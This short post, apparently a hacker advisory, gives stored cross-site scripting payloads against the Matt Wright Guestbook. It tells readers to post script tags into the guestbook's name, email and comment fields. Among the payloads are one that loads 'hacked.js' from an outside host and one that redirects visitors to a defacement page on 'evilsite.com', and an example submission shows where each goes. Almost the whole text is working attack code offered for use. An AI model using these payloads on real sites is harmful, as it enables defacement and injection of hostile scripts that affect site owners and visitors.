Matt Wright Guestbook Xss Script İnjection
Post This Code:
<script>alert(/Liz0ziM/)</script>
<script src=http://liz0.li.funpic.org/hacked.js></script>
<script>location.href="http://evilsite.com/deface.html";</script>
Example Post Message :
Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html";</script>
Source:
http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html